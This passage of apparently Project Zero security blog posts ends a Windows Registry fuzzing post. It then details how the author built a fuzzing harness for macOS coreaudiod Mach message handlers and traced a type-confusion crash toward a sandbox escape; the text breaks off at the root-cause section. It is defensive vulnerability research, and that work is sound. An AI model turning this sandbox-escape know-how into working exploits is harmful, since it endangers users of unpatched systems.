If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation. For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each cell at the end of a separate bin, followed by another, empty bin. This behavior would be very similar to how the Special Pool works, but at the bin and cell level.
Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency. This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.
Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation. In particular, an interesting idea would be to use the self-healing property of the registry. Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process. We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.
As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data.
Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior. For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks. Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.
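The "before/after" comparison from the self-healing idea boils down to a set difference over flattened paths. A sketch, assuming a parser (e.g., built on offreg.dll) that returns the same dict-shaped dump for both snapshots – the dump format here is a made-up stand-in:

```python
def hive_paths(key, prefix=""):
    """Flatten a logical hive dump into a set of key and value paths."""
    path = prefix + "\\" + key["name"]
    paths = {path} | {path + " :: " + name for name in key["values"]}
    for sub in key["subkeys"]:
        paths |= hive_paths(sub, path)
    return paths

def self_heal_diff(before, after):
    # Anything present before the load/unload round trip but gone afterwards
    # was sanitized away by the loader - a strong signal worth logging.
    return sorted(hive_paths(before) - hive_paths(after))
```

Any non-empty diff means the mutated input tripped a sanitization path in the loader, even if nothing crashed – exactly the kind of early signal that plain crash monitoring misses.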
Conclusion
This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them. We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications. See you then!
Guest post by Dillon Franke, Senior Security Engineer, 20% time on Project Zero
Every second, highly-privileged MacOS system daemons accept and process hundreds of IPC messages. In some cases, these message handlers accept data from sandboxed or unprivileged processes.
In this blog post, I’ll explore using Mach IPC messages as an attack vector to find and exploit sandbox escapes. I’ll detail how I used a custom fuzzing harness, dynamic instrumentation, and plenty of debugging/static analysis to identify a high-risk type confusion vulnerability in the coreaudiod system daemon. Along the way, I’ll discuss some of the difficulties and tradeoffs I encountered.
Transparently, this was my first venture into the world of MacOS security research and building a custom fuzzing harness. I hope this post serves as a guide to those who wish to embark on similar research endeavors.
For this research project, I adopted a hybrid approach that combined fuzzing and manual reverse engineering, which I refer to as knowledge-driven fuzzing. This method, learned from my friend Ned Williamson, balances automation with targeted investigation. Fuzzing provided the means to quickly test a wide range of inputs and identify areas where the system’s behavior deviated from expectations. However, when the fuzzer’s code coverage plateaued or specific hurdles arose, manual analysis came into play, forcing me to dive deeper into the target’s inner workings.
Knowledge-driven fuzzing offers two key advantages. First, the research process never stagnates, as the goal of improving the code coverage of the fuzzer is always present. Second, achieving this goal requires a deep understanding of the code you are fuzzing. By the time you begin triaging legitimate, security-relevant crashes, the reverse engineering process will have given you extensive knowledge of the codebase, enabling analysis of crashes from an informed perspective.
The cycle I followed during this research is as follows:
Identify an attack vector
Choose a target
Create a fuzzing harness
Fuzz and produce crashes
Analyze crashes and code coverage
Iterate on the fuzzing harness
Repeat steps 4-6
Identify an Attack Vector
Standard browser sandboxing limits code execution by restricting direct operating system access. Consequently, exploiting a browser vulnerability typically requires the use of a separate “sandbox escape” vulnerability.
Since interprocess communication (IPC) mechanisms allow two processes to communicate with each other, they can naturally serve as a bridge from a sandboxed process to an unrestricted one. This makes them a prime attack vector for sandbox escapes, as shown below.
I chose Mach messages, the lowest-level IPC component in the MacOS operating system, as the attack vector of focus for this research. I chose them mostly due to my desire to understand MacOS IPC mechanisms at their most fundamental level, as well as the track record of historical security issues with Mach messages.
Previous Work and Background
Leveraging Mach messages in exploit chains is far from a novel idea. For example, Ian Beer identified a core design issue in 2016 with the XNU kernel related to the handling of task_t Mach ports, which allowed for exploitation via Mach messages. Another post showed how an in-the-wild exploit chain utilized Mach messages in 2019 for heap grooming techniques. I also drew much inspiration from Ret2 Systems’ blog post about leveraging Mach message handlers to find and weaponize a Safari sandbox escape.
I won’t spend too much time detailing the ins and outs of how Mach messages work (that is better left to a more comprehensive post on the subject), but here’s a brief overview of Mach IPC for this blog post:
Mach messages are stored within kernel-managed message queues, represented by a Mach port
A process can fetch a message from a given port if it holds the receive right for that port
A process can send a message to a given port if it holds a send right to that port
MacOS applications can register a service with the bootstrap server, a special Mach port to which all processes have a send right by default. This allows other processes to send a Mach message to the bootstrap server inquiring about a specific service, and the bootstrap server can respond with a send right to that service’s Mach port. MacOS system daemons register Mach services via launchd. You can view their .plist files within the /System/Library/LaunchAgents and /System/Library/LaunchDaemons directories to get an idea of the services registered. For example, the .plist file below highlights a Mach service registered for the Address Book application on MacOS using the identifier com.apple.AddressBook.AssistantService.
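Such a registration generally follows the shape of the illustrative sketch below. The Program path and surrounding keys are guesses for illustration only; MachServices is the dictionary launchd reads to register the Mach service (see launchd.plist(5)):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.AddressBook.AssistantService</string>
    <key>Program</key>
    <string>/System/Library/Frameworks/AddressBook.framework/Helpers/AddressBookAssistantService</string>
    <key>MachServices</key>
    <dict>
        <key>com.apple.AddressBook.AssistantService</key>
        <true/>
    </dict>
</dict>
</plist>
```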
After deciding I wanted to research Mach services, the next question was which service to target. In order for a sandboxed process to send Mach messages to a service, it has to be explicitly allowed. If the process is using Apple’s App Sandbox feature, this is done within a .sb file, written using the TinyScheme format. The snippet below shows an excerpt of the sandbox file for a WebKit GPU Process. The allow mach-lookup directive is used to allow a sandboxed process to lookup and send Mach messages to a service.
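An excerpt of that kind of profile might look like the following sketch; the (allow mach-lookup (global-name ...)) pattern is the real profile syntax, while the specific service names shown here are illustrative rather than copied from the actual GPU Process profile:

```scheme
;; Allow looking up (and thus messaging) specific Mach services by name.
(allow mach-lookup
    (global-name "com.apple.audio.audiohald")
    (global-name "com.apple.windowserver.active"))
```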
This helped me narrow my focus significantly from all MacOS processes, to processes with a sandbox-accessible Mach service:
In addition to inspecting the sandbox profiles, I used Jonathan Levin’s sbtool utility to test which Mach services could be interacted with for a given process. The tool (which was a bit outdated, but I was able to get it to compile) uses the builtin sandbox_exec function under the hood to provide a nice list of accessible Mach service identifiers:
❯ ./sbtool 2813 mach
com.apple.logd
com.apple.xpc.smd
com.apple.remoted
com.apple.metadata.mds
com.apple.coreduetd
com.apple.apsd
com.apple.coreservices.launchservicesd
com.apple.bsd.dirhelper
com.apple.logind
com.apple.revision
…Truncated…
Ultimately, I chose to take a look at the coreaudiod daemon, and specifically the com.apple.audio.audiohald service for the following reasons:
It is a complex process
It allows Mach communications from several impactful applications, including the Safari GPU process
The Mach service had a large number of message handlers
The service seemed to allow control and modification of audio hardware, which would likely require elevated privileges
The coreaudiod binary and the CoreAudio Framework it heavily uses were both closed source, which would provide a unique reverse engineering challenge
Create a Fuzzing Harness
Once I chose an attack vector and target, the next step was to create a fuzzing harness capable of sending input through the attack vector (a Mach message) at a proper location within the target.
A coverage-guided fuzzer is a powerful weapon, but only if its energy is focused in the right place—like a magnifying glass concentrating sunlight to start a fire. Without proper focus, the energy dissipates, achieving little impact.
Determining an Entry Point
Ideally, a fuzzer should perfectly replicate the environment and capabilities available to a potential attacker. However, this isn't always practical. Trade-offs often need to be made, such as accepting a higher rate of false positives for increased performance, simplified instrumentation, or ease of development. Therefore, identifying the “right place” to fuzz is highly dependent on the specific target and research goals.
Option 1: Interprocess Fuzzing
All Mach messages are sent and received using the mach_msg API, as shown below. Therefore, I thought the most intuitive way to fuzz coreaudiod's Mach message handlers would be to write a fuzzing harness that called the mach_msg API and let my fuzzer modify the message contents to produce crashes. The approach would look something like this:
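A minimal sketch of the shape such an interprocess harness would take. The struct here is a simplified stand-in for mach_msg_header_t (the real definitions live in <mach/mach.h>), and the field values are illustrative, not the actual message format coreaudiod expects:

```cpp
#include <cstdint>
#include <cstring>

// Simplified stand-in for the mach_msg_header_t fields the harness
// would populate before sending (real types come from <mach/mach.h>).
struct FuzzMsgHeader {
  uint32_t msgh_bits;
  uint32_t msgh_size;
  uint32_t msgh_remote_port;  // send right to com.apple.audio.audiohald
  uint32_t msgh_local_port;   // reply port
  uint32_t msgh_id;           // selects the MIG message handler
};

struct FuzzMsg {
  FuzzMsgHeader hdr;
  uint8_t body[1024];
};

// Build a message whose id and body come from fuzzer-controlled bytes.
FuzzMsg BuildFuzzMsg(uint32_t msgh_id, const uint8_t* data, size_t len) {
  FuzzMsg msg{};
  msg.hdr.msgh_id = msgh_id;
  if (len > sizeof(msg.body)) len = sizeof(msg.body);
  msg.hdr.msgh_size = sizeof(FuzzMsgHeader) + static_cast<uint32_t>(len);
  std::memcpy(msg.body, data, len);
  // On macOS, the harness would now deliver the message via:
  //   mach_msg(&msg.hdr, MACH_SEND_MSG, msg.hdr.msgh_size, 0,
  //            MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
  return msg;
}
```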
However, this approach had a large downside: since we were sending IPC messages, the fuzzing harness would be in a different process space than the target. This meant code coverage information would need to be shared across a process boundary, which is not supported by most fuzzing tools. Additionally, kernel message queue processing adds a significant performance overhead.
Option 2: Direct Harness
While requiring a bit more work up front, another option was to write a fuzzing harness that directly loaded and called the Mach message handlers of interest. This would have the massive advantage of putting our fuzzer and instrumentation in the same process as the message handlers, allowing us to more easily obtain code coverage.
One notable downside of this fuzzing approach is that it assumes all fuzzer-generated inputs pass the kernel’s Mach message validation layer, which in a real system occurs before a message handler gets called. As we’ll see later, this is not always the case. In my view, however, the pros of fuzzing in the same process space (speed and easy code coverage collection) outweighed the cons of a potential increase in false positives.
The approach would be as follows:
Identify a suitable function for processing incoming Mach messages
Write a fuzzing harness to load the message handling code from coreaudiod
Use a fuzzer to generate inputs and call the fuzzing harness
Profit, hopefully
Finding the Mach Message Handler
To start, I searched for the Mach service identifier, com.apple.audio.audiohald, but found no references to it within the coreaudiod binary. Next, I checked the libraries it loaded using otool. Logically, the CoreAudio framework seemed like a good candidate for housing the code for our message handler.
$ otool -L /usr/sbin/coreaudiod
/usr/sbin/coreaudiod:
/System/Library/PrivateFrameworks/caulk.framework/Versions/A/caulk (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 2602.0.255)
/usr/lib/libAudioStatistics.dylib (compatibility version 1.0.0, current version 1.0.0, weak)
/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 2602.0.255)
/usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1700.255.5)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1345.120.2)
However, I was surprised to find that the path returned by otool did not exist!
A bit of research showed me that as of macOS Big Sur, most framework binaries are not stored on disk but within the dyld shared cache, a mechanism for pre-linking libraries to allow applications to run faster. Thankfully, IDA Pro, Binary Ninja, and Ghidra all support parsing the dyld shared cache to obtain the libraries stored within. I also used this helpful tool to successfully extract libraries for additional analysis.
Once I had the CoreAudio Framework within IDA, I quickly found a call to bootstrap_check_in with the service identifier passed as an argument, proving the CoreAudio framework binary was responsible for setting up the Mach service I wanted to fuzz. However, it still wasn’t obvious where the message handling code was happening, despite quite a bit of reverse engineering.
It turns out this is due to the use of the Mach Interface Generator (MIG), an Interface Definition Language from Apple that makes it easier to write RPC clients and servers by abstracting away much of the Mach layer. When compiled, MIG message handling code gets bundled into a structure called a subsystem. One can easily grep for these subsystems to find their offsets:
Next, I searched in IDA for cross-references to the _HALS_HALB_MIGServer_subsystem symbol, which identified the MIG server function that parsed incoming Mach messages! The routine is shown below, with the first parameter (the rdi register) being the incoming Mach message and the second (the rsi register) being the message to return to the client. The MIG server function extracted the msgh_id parameter from the Mach message and used that to index into the MIG subsystem. Then, the necessary function handler was called.
I further confirmed this by setting an LLDB breakpoint on the coreaudiod process (after disabling SIP) for the _HALB_MIGServer_server function. Then, I adjusted the volume on my system, and the breakpoint was hit:
In this example, tracing the message handler called from the MIG subsystem showed the _XObject_HasProperty function was called based on the Mach message’s msgh_id.
Depending on the msgh_id, a few dozen message handlers were accessible from the MIG subsystem. They are easily identifiable by the convenient __X prefix to their function names added by MIG.
The _HALB_MIGServer_server function struck a great balance between getting close to low-level message handling code while still resembling the inputs that a call to mach_msg would take. I decided this was where I would inject fuzz input.
Creating a Basic Fuzzing Harness
After identifying the function I wanted to fuzz, the next step was to write a program to read a file and deliver the file’s contents as input to the target function. This might have been as easy as linking the CoreAudio library with my fuzzing harness and calling the _HALB_MIGServer_server function, but unfortunately the function was not exported.
So, the high level function of my harness was as follows:
Load the CoreAudio Library
Get a function pointer for the target function from the CoreAudio Library
Read an input from a file
Call the target function with the input
The full implementation of my fuzzing harness can be found here. An example of invoking the harness to send a message from an input file is shown below:
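A condensed sketch of those four steps might look like the following. The offset constant is a placeholder (it changes with every macOS build), and the use of AudioObjectShow as an exported anchor symbol is my assumption for illustration; the actual harness is the one linked above:

```cpp
#include <cstdio>
#include <cstdint>
#include <vector>
#include <dlfcn.h>

using MigServerFn = bool (*)(void* request, void* reply);

// Step 3: read a fuzz input from a file.
std::vector<unsigned char> ReadInput(const char* path) {
  std::vector<unsigned char> data;
  if (FILE* f = std::fopen(path, "rb")) {
    unsigned char buf[4096];
    size_t n;
    while ((n = std::fread(buf, 1, sizeof(buf), f)) > 0)
      data.insert(data.end(), buf, buf + n);
    std::fclose(f);
  }
  return data;
}

int RunHarness(const char* input_path) {
  // Step 1: load the CoreAudio framework (resolved via the dyld shared cache).
  void* lib = dlopen(
      "/System/Library/Frameworks/CoreAudio.framework/CoreAudio", RTLD_NOW);
  if (!lib) return 1;
  // Step 2: _HALB_MIGServer_server is not exported, so dlsym() cannot find
  // it directly; compute it from an exported symbol plus a constant offset
  // recovered in a disassembler. kOffset is hypothetical.
  const uintptr_t kOffset = 0x0;  // placeholder -- differs per build
  auto anchor = reinterpret_cast<uintptr_t>(dlsym(lib, "AudioObjectShow"));
  auto server = reinterpret_cast<MigServerFn>(anchor + kOffset);
  // Steps 3 and 4: read the input and hand it to the target function.
  std::vector<unsigned char> input = ReadInput(input_path);
  unsigned char reply[4096] = {};
  if (!input.empty()) server(input.data(), reply);
  return 0;
}
```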
I now had a way to deliver data directly into the MIG subsystem (_HALB_MIGServer_server) I wanted to fuzz. However, I didn’t know the specific message size, options, or data the handler was expecting. While a coverage-guided fuzzer will begin to uncover the proper message format over time, it is advantageous to obtain a seed corpus of legitimate inputs when first beginning to fuzz to improve efficiency.
To do this, I used LLDB to set a breakpoint on the MIG subsystem and dump the first argument (containing the incoming Mach message). Then, I played around with the operating system to cause Mach messages to be sent to coreaudiod. The Audio MIDI Setup macOS application ended up being great for this, as it allows one to create, edit, and delete audio devices.
Fuzz and Produce Crashes
Armed with a small seed corpus and an input delivery mechanism, the next step was to configure a fuzzer to use the created fuzzing harness and obtain code coverage. I used the excellent Jackalope fuzzer built and maintained by Ivan Fratric. I chose Jackalope primarily for its high level of customizability—it allows easy implementation of custom mutators, instrumentation, and sample delivery. Additionally, I appreciated its seamless usage on macOS, particularly its code coverage capabilities powered by TinyInst. In contrast, I tried and failed to collect code coverage using Frida against system daemons on macOS.
I used the following command to start a Jackalope fuzzing run:
This harness quickly generated many crashes, a sign I was on the right track. However, I soon learned that initial crashes are often not indicative of a security bug, but of a design bug in the fuzzing harness itself or an invalid assumption.
Iteration 1: Target Initialization
One of the difficulties with my fuzzing approach was that my target function (the Mach message handler) expected the HAL system to be in a specific state to begin receiving Mach messages. By simply calling the library function with my fuzzing harness, these assumptions were broken.
This caused errors to start popping up. As shown in the diagram below, the harness bypassed much of the bootstrapping functionality the coreaudiod process would normally take care of during startup.
Code coverage, as well as error messages, can be very helpful in determining the initialization steps a fuzzing harness is neglecting. For example, I noticed my data flow would always fail early in most Mach message handlers, logging the message Error: there is no system.
It turns out I needed to initialize the HAL System before I could interact correctly with the Mach APIs. In my case, calling the _AudioHardwareStartServer function in my fuzzing harness took care of most of the necessary initialization.
Iteration 2: API Call Chaining
My first crack at a fuzzing harness was cool, but it made a pretty large assumption: all accessible Mach message handlers functioned independently of each other. As I quickly learned, this assumption was incorrect. As I ran the fuzzer, error messages like the following one started popping up:
The error seemed to indicate the SetPropertyData Mach handler was expecting a client to be registered via a previous Mach message. Clearly, the Mach handlers I was fuzzing were stateful and depended on each other to function properly. My fuzzing harness would need to take this into consideration in order to have any hope of obtaining good code coverage on the target.
This highlights a common problem in the fuzzing world: most coverage-guided fuzzers accept a single input (a bunch of bytes), while many things we want to fuzz accept data in a completely different format, such as several arguments of different types, or even several function calls. This Google writeup explains the problem well, as does Ned Williamson’s OffensiveCon talk from 2019.
To get around this limitation, we can use a technique I refer to as API Call Chaining, which considers each fuzz input as a stream that can be read from to craft multiple valid inputs. Thus, each fuzzing iteration would be capable of generating multiple Mach messages. This simple but important insight allows a fuzzer to explore the interdependency of separate function calls using the same code-coverage informed input.
The FuzzedDataProvider class, which is part of LibFuzzer but can be included as a header for use with any fuzzing harness, is a great choice for consuming a fuzz sample and transforming it into a more meaningful data type. Consider the following pseudocode:
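A simplified, self-contained stand-in for FuzzedDataProvider illustrating the idea. The selector/length encoding and the SendToMigSubsystem callback are my assumptions for the sketch, not the post's actual harness code:

```cpp
#include <cstdint>
#include <cstring>
#include <vector>

// Minimal stand-in for LibFuzzer's FuzzedDataProvider: consumes a byte
// stream and turns it into typed values, deterministically.
class DataProvider {
 public:
  DataProvider(const uint8_t* data, size_t size) : data_(data), size_(size) {}
  bool remaining() const { return size_ > 0; }
  uint8_t ConsumeByte() {
    if (size_ == 0) return 0;
    --size_;
    return *data_++;
  }
  std::vector<uint8_t> ConsumeBytes(size_t n) {
    if (n > size_) n = size_;
    std::vector<uint8_t> out(data_, data_ + n);
    data_ += n;
    size_ -= n;
    return out;
  }
 private:
  const uint8_t* data_;
  size_t size_;
};

// One fuzz input -> a *chain* of Mach messages. The first byte of each
// round selects which handler to target; the next bytes form the body.
// SendToMigSubsystem stands in for the harness's own delivery function.
int ChainCalls(const uint8_t* data, size_t size,
               void (*SendToMigSubsystem)(uint8_t selector,
                                          const std::vector<uint8_t>& body)) {
  DataProvider provider(data, size);
  int calls = 0;
  while (provider.remaining()) {
    uint8_t selector = provider.ConsumeByte();  // which message handler
    size_t body_len = provider.ConsumeByte();   // how many body bytes follow
    std::vector<uint8_t> body = provider.ConsumeBytes(body_len);
    SendToMigSubsystem(selector, body);         // e.g. _XSystem_Open first
    ++calls;
  }
  return calls;
}
```

Because the transformation is deterministic, the fuzzer's byte-level mutations map to stable changes in the sequence of messages, letting coverage feedback discover productive call orderings.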
This code transforms a blob of bytes into a mechanism that can repeatedly call APIs with fuzz data in a deterministic manner. What’s more, a coverage-guided fuzzer will be able to explore and identify a series of API calls that improves code coverage. From the fuzzer’s perspective, it is simply modifying an array of bytes, blissfully unaware of the additional complexity happening under the hood.
For example, my fuzzer quickly identified that most interactions with the audiohald service required a call to the _XSystem_Open message handler to register a client before most APIs could be called. The inputs the fuzzer saved to its corpus naturally reflected this fact over time.
Iteration 3: Mocking Out Buggy/Unneeded Functionality
Sometimes coverage plateaus, and a fuzzer struggles to explore new code paths. For example, say we’re fuzzing an HTTP server and it keeps getting stuck because it’s trying to read and parse configuration files on startup. If our focus was on the server’s request parsing and response logic, we might choose to mock out the functionality we don’t care about in order to focus the fuzzer’s code coverage exploration elsewhere.
In my fuzzing harness’ case, calling the initialization routines caused my harness to try to register the com.apple.audio.audiohald Mach service with the bootstrap server, which threw an error because the service was already registered by launchd. Since my harness didn’t need to register the Mach service in order to inject messages (remember, our harness calls the MIG subsystem directly), I decided to mock out the functionality.
When dealing with pure C functions, function interposing can be used to easily modify a function’s behavior. In the example below, I declare a new version of the bootstrap_check_in function that simply returns KERN_SUCCESS, effectively nopping it out while telling the caller that it was successful.
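A minimal sketch of this interposing pattern. The __DATA,__interpose section is Mach-O-specific (guarded here so the sketch compiles elsewhere), and the replacement's exact behavior, like zeroing the service port, is my assumption:

```cpp
#include <cstdint>

typedef int kern_return_t;
typedef uint32_t mach_port_t;
#define KERN_SUCCESS 0

// On macOS, this declaration comes from <servers/bootstrap.h>.
extern "C" kern_return_t bootstrap_check_in(mach_port_t bp, const char* name,
                                            mach_port_t* sp);

// Replacement: pretend the check-in succeeded without touching launchd.
extern "C" kern_return_t my_bootstrap_check_in(mach_port_t, const char*,
                                               mach_port_t* sp) {
  if (sp) *sp = 0;      // hand back a null service port
  return KERN_SUCCESS;  // caller believes registration worked
}

#ifdef __APPLE__
// dyld reads this __interpose section at load time and rewires every call
// to bootstrap_check_in so it lands in my_bootstrap_check_in instead.
__attribute__((used, section("__DATA,__interpose")))
static struct { const void* replacement; const void* replacee; }
    interposers[] = {{(const void*)my_bootstrap_check_in,
                      (const void*)bootstrap_check_in}};
#endif
```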
In the case of C++ functions, I used TinyInst’s Hook API to modify problematic functionality. In one specific scenario, my fuzzer was crashing the target constantly because the CFRelease function was being called with a NULL pointer. Some further analysis told me that this was a non-security relevant bug where a user’s input, which was assumed to contain a valid plist object, was not properly validated. If the plist object was invalid or NULL, a downstream function call would contain NULL, and an abort would occur.
So, I wrote the following TinyInst hook, which checked whether the plist object passed into the function was NULL. If so, my hook returned the function call early, bypassing the buggy code.
printf("$RIP register is now: %p\n", GetRegister(ARCH_PC));
SetRegister(RSP, GetRegister(RSP) + 8); // Simulate a ret instruction
printf("$RSP is now: %p\n", GetRegister(RSP));
Next, I modified Jackalope to use my instrumentation via the CreateInstrumentation API. That way, my hook was applied during each fuzzing iteration, and the annoying NULL CFRelease calls stopped happening. The output below shows the hook preventing a crash from a NULL plist object passed to the troublesome API:
The great thing about a fuzzing-centric auditing technique is that it highlights knowledge gaps in the code you are auditing. As you address these gaps, you gain a deeper understanding of the structure and constraints of the inputs that your fuzzing harness should generate. These insights enable you to refine your harness to produce more targeted inputs, effectively penetrating deeper code paths and improving overall code coverage. The following subsections highlight examples of how I identified and implemented opportunities to iterate on my fuzzing harness, significantly enhancing its efficiency and effectiveness.
Message Handler Syntax Checks
Code coverage results from fuzzing runs are incredibly telling. I noticed that after running my fuzzer for a few days, it was having trouble exploring past the beginning of most of the Mach message handlers. One simple example is shown below (explored basic blocks are highlighted in blue), where several comparisons were not being passed, causing the function to error out early on. Here, the rdi register is the incoming Mach message we sent to the handler.
The comparisons were checking that the Mach message was well formatted, with a message length set to 0x34 and various options set within the message. If it wasn’t, the message was discarded.
With this in mind, I modified my fuzzing harness to set the fields in the Mach messages I sent to the _XIOContext_SetClientControlPort handler such that they passed these conditions. The fuzzer could modify other pieces of the message as it pleased, but since these aspects needed to conform to strict guidelines, I simply hardcoded them.
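A sketch of this constraint-hardcoding step. The struct layout mirrors mach_msg_header_t but is simplified, and the msgh_bits and msgh_id values are illustrative assumptions; only the 0x34 length comes from the analysis above:

```cpp
#include <cstdint>
#include <cstring>

// Simplified message layout for _XIOContext_SetClientControlPort.
// Field names follow mach_msg_header_t; the 24-byte header plus a
// body padded so the total size is exactly 0x34 bytes.
struct SetClientControlPortMsg {
  uint32_t msgh_bits;
  uint32_t msgh_size;
  uint32_t msgh_remote_port;
  uint32_t msgh_local_port;
  uint32_t msgh_voucher_port;
  uint32_t msgh_id;
  uint8_t  body[0x34 - 24];
};

// Hardcode everything the handler's early checks reject, then let the
// fuzzer control only the body bytes.
void ShapeMessage(SetClientControlPortMsg* msg,
                  const uint8_t* fuzz, size_t len) {
  msg->msgh_size = 0x34;        // exact length the handler expects
  msg->msgh_bits = 0x80001112;  // illustrative "complex message" bits
  msg->msgh_id   = 1010030;     // hypothetical routine id for this handler
  if (len > sizeof(msg->body)) len = sizeof(msg->body);
  std::memcpy(msg->body, fuzz, len);  // fuzzer-controlled payload
}
```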
These small modifications were the beginning of an input structure I was building for my target. The efficiency of my fuzzing improved astronomically after adding these guidelines: my code coverage increased by 2000% shortly thereafter.
Out-of-Line (OOL) Message Data
I noticed my fuzzing setup started generating tons of crashes from a call to mig_deallocate, which frees a given address. At first, I thought I had found an interesting bug, since I could control the address passed to mig_deallocate:
I quickly learned, however, that Mach messages can contain various types of Out-of-line (OOL) data. This allows a client to allocate a memory region and place a pointer to it within the Mach message, which will be processed and, in some cases, freed by the message handler. When sending a Mach message with the mach_msg API, the XNU kernel will validate that the memory pointed to by OOL descriptors is properly owned and accessible by the client process.
I hadn’t found a vulnerability; my fuzzing harness was simply attached to the target at a point downstream of the normal memory checks that would have been performed by the kernel. To remedy this, I modified my fuzzing harness to support allocating space for OOL data and passing the valid memory address within the Mach messages I fuzzed.
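A sketch of that remedy. The struct is a simplified stand-in for mach_msg_ool_descriptor_t, and the ownership convention in the comments is an assumption for illustration:

```cpp
#include <cstdint>
#include <cstdlib>
#include <cstring>

// Simplified stand-in for mach_msg_ool_descriptor_t: the handler reads
// `address` and may later mig_deallocate() it, so it must point at real,
// owned memory rather than at raw fuzzer bytes.
struct OolDescriptor {
  void*    address;
  uint32_t size;
  uint32_t deallocate;
};

// Copy fuzzer bytes into a fresh allocation and reference it from the
// descriptor, mimicking what the kernel guarantees for genuine clients.
OolDescriptor MakeOolDescriptor(const uint8_t* fuzz, uint32_t len) {
  OolDescriptor desc{};
  desc.address = std::malloc(len ? len : 1);
  std::memcpy(desc.address, fuzz, len);
  desc.size = len;
  desc.deallocate = 1;  // the handler owns (and may free) the region
  return desc;
}
```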
The Vulnerability
After many fuzzing harness iterations, LLDB “next instruction” commands, and hours spent overheating my MacBook Pro, I had finally begun to acquire an understanding of the CoreAudio framework and generate some meaningful crashes.
But first, some background knowledge.
The Hardware Abstraction Layer (HAL)
The com.apple.audio.audiohald Mach service exposes an interface known as the Hardware Abstraction Layer (HAL). The HAL allows clients to interact with audio devices, plugins, and settings on the operating system, represented in the coreaudiod process as C++ objects of type HALS_Object.
In order to interact with the HAL, a client must first register itself. There are a few ways to do this, but the simplest is using the _XSystem_Open Mach API. Calling this API will invoke the HALS_System::AddClient method, which uses the Mach message’s audit token to create a client (clnt) HALS_Object to map subsequent requests to that client. The code block below shows an IDA decompilation snippet of the creation of a clnt object.
Stepping into the HALS_Object constructor, a mutex is acquired and the next available object ID is obtained before a call is made to HALS_ObjectMap::MapObject.
The HALS_ObjectMap::MapObject function adds the freshly allocated object to a linked list stored on the heap. I wrote a program using the TinyInst Hook API that iterates through each object in the list and dumps its raw contents:
To modify an existing HALS_Object, most of the HAL Mach message handlers use the HALS_ObjectMap::CopyObjectByObjectID function, which accepts an integer ID (parsed from the Mach message’s body) for a given HALS_Object, looks it up in the Object Map, and returns a pointer to the object.
For example, here’s a small snippet of the _XSystem_GetObjectInfo Mach message handler, which calls the HALS_ObjectMap::CopyObjectByObjectID function before accessing information about the object and returning it.
Whenever my fuzzer produced a crash, I always took the time to fully understand the crash’s root cause. Often, the crashes were not security relevant (e.g., a NULL dereference), but fully understanding the reason behind each crash helped me better understand the target and uncover invalid assumptions I was making with my fuzzing harness. Eventually, when I did identify security-relevant crashes, I had a good understanding of the context surrounding them.
The first indication from my fuzzer that a vulnerability might exist was a memory access violation during an indirect call instruction, where the target address was calculated using an index into the rax register. As shown in the following backtrace, the crash occurred shallowly within the _XIOContext_Fetch_Workgroup_Port Mach message handler.
Further investigating the context of the crash in IDA, I noticed that the rax register triggering the invalid memory access was directly derived from a call to the HALS_ObjectMap::CopyObjectByObjectID function.
Specifically, it attempted the following:
Fetch a HALS_Object from the Object Map based on an ID provided in the Mach message
Dereference the address a1 at offset 0x68 of the HALS_Object
Dereference the address a2 at offset 0x0 of a1
Call the function pointer at offset 0x168 of a2
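The crashing sequence can be modeled as a chain of raw pointer dereferences. The 0x68, 0x0, and 0x168 offsets come from the crash analysis above; everything else (the function signature, the fabricated object layout) is an assumption for illustration:

```cpp
#include <cstdint>

// Model of the layout the handler assumes: a HALS_Object whose field at
// +0x68 points to a C++ object, whose vtable entry at +0x168 is called.
using WorkgroupPortFn = uint64_t (*)();

uint64_t FetchWorkgroupPort(uint8_t* hals_object) {
  // Dereference the address a1 at offset 0x68 of the HALS_Object.
  uint8_t* a1 = *reinterpret_cast<uint8_t**>(hals_object + 0x68);
  // Dereference the address a2 (the presumed vtable) at offset 0x0 of a1.
  uint8_t* a2 = *reinterpret_cast<uint8_t**>(a1 + 0x0);
  // Call the function pointer at offset 0x168 of a2. If the fetched
  // object is not an ioct, nothing guarantees these pointers are valid:
  // this is exactly where the type confusion becomes control-flow hijack.
  auto fn = *reinterpret_cast<WorkgroupPortFn*>(a2 + 0x168);
  return fn();
}
```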
What Went Wrong?
